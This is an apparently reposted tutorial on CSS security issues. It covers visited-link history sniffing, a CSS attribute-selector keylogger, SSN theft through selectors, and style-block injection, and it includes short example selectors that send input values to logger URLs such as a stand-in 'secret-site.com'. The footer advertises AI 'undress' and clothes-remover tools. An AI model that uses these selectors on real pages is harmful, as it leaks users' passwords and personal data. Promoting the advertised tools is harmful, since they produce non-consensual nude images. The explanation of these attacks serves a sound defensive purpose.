Table of Contents
Link issues that have been visited
Keylogger
Data Theft
Inline style block problem
There are definitely more
Home Web Front-end CSS Tutorial CSS Security Vulnerabilities

CSS Security Vulnerabilities

Apr 17, 2025 am 10:02 AM

CSS Security Vulnerabilities

Don't panic! CSS itself is not a major security risk, and in most cases there is no need to worry too much.

However, some articles will discuss potentially surprising and even worrying features of CSS. Let's summarize:

The problem is described as follows:

  1. There is a link on the website to a specific page, such as Tickle Pigs .
  2. You use the :visited style to set the color of the visited link, such as a:visited { color: pink; } , which is not the default user agent style.
  3. You test the calculation style of the link.
  4. If the color is pink, it means that the user has visited the page.
  5. You report this information to a server and perform certain actions accordingly (such as increasing the insurance premium rate).

You might even do this with CSS completely, because the :visited style may contain background-image: url(/data-logger/tickle.php); , which will only be requested by users who have visited the page.

Don't worry! Browsers have blocked this attack.

Keylogger

The problem is described as follows:

  1. There is an input box on the page, probably a password input box.
  2. You take a record script as the background image of the input box and add a large number of selectors to collect password information.
 input[value^="a"] { background: url(logger.php?v=a); }
Copy after login

This is not easy to achieve. value attribute of the input box will not change immediately due to user input. But in frameworks like React, this happens sometimes. So, in theory, this CSS keylogger might work if you add this CSS to a login page built with React.

However, in this case, the JavaScript code has been executed on the page. For such attacks, JavaScript is much more dangerous than CSS. The JavaScript keylogger monitors key events and reports them through Ajax with just a few lines of code.

Content Security Policy (CSP) can block inline JavaScript injected by third parties and XSS...and of course, it can also block CSS.

Data Theft

The problem is described as follows:

  1. If I can add malicious CSS to the page of the website you are logged in...
  2. And the website displays sensitive information, such as a Social Security Number (SSN), pre-filled in the form...
  3. I can get it with the property selector.
 input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }
Copy after login

With a large number of selectors, you can cover all possibilities!

Inline style block problem

I'm not sure if this should be blamed on CSS, but imagine:

 ... Insert some user generated content...
Copy after login

Maybe you allow the user to customize some CSS. This is an attack vector because they can close style tags, open script tags, and write malicious JavaScript code.

There are definitely more

Have you thought of it? Share it.

I'm skeptical of the level of fear of CSS security vulnerabilities. I don't want to over-the-top the security issues (especially third-party issues) because I'm not an expert and safety is crucial. But at the same time, I've never heard of CSS becoming any attack vector other than thought experiments. Please teach me!

The above is the detailed content of CSS Security Vulnerabilities. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Vue 3 Vue 3 Apr 02, 2025 pm 06:32 PM

It's out! Congrats to the Vue team for getting it done, I know it was a massive effort and a long time coming. All new docs, as well.

Can you get valid CSS property values from the browser? Can you get valid CSS property values from the browser? Apr 02, 2025 pm 06:17 PM

I had someone write in with this very legit question. Lea just blogged about how you can get valid CSS properties themselves from the browser. That's like this.

Stacked Cards with Sticky Positioning and a Dash of Sass Stacked Cards with Sticky Positioning and a Dash of Sass Apr 03, 2025 am 10:30 AM

The other day, I spotted this particularly lovely bit from Corey Ginnivan’s website where a collection of cards stack on top of one another as you scroll.

A bit on ci/cd A bit on ci/cd Apr 02, 2025 pm 06:21 PM

I'd say "website" fits better than "mobile app" but I like this framing from Max Lynch:

Using Markdown and Localization in the WordPress Block Editor Using Markdown and Localization in the WordPress Block Editor Apr 02, 2025 am 04:27 AM

If we need to show documentation to the user directly in the WordPress editor, what is the best way to do it?

Comparing Browsers for Responsive Design Comparing Browsers for Responsive Design Apr 02, 2025 pm 06:25 PM

There are a number of these desktop apps where the goal is showing your site at different dimensions all at the same time. So you can, for example, be writing

Why are the purple slashed areas in the Flex layout mistakenly considered 'overflow space'? Why are the purple slashed areas in the Flex layout mistakenly considered 'overflow space'? Apr 05, 2025 pm 05:51 PM

Questions about purple slash areas in Flex layouts When using Flex layouts, you may encounter some confusing phenomena, such as in the developer tools (d...

How to select a child element with the first class name item through CSS? How to select a child element with the first class name item through CSS? Apr 05, 2025 pm 11:24 PM

When the number of elements is not fixed, how to select the first child element of the specified class name through CSS. When processing HTML structure, you often encounter different elements...

See all articles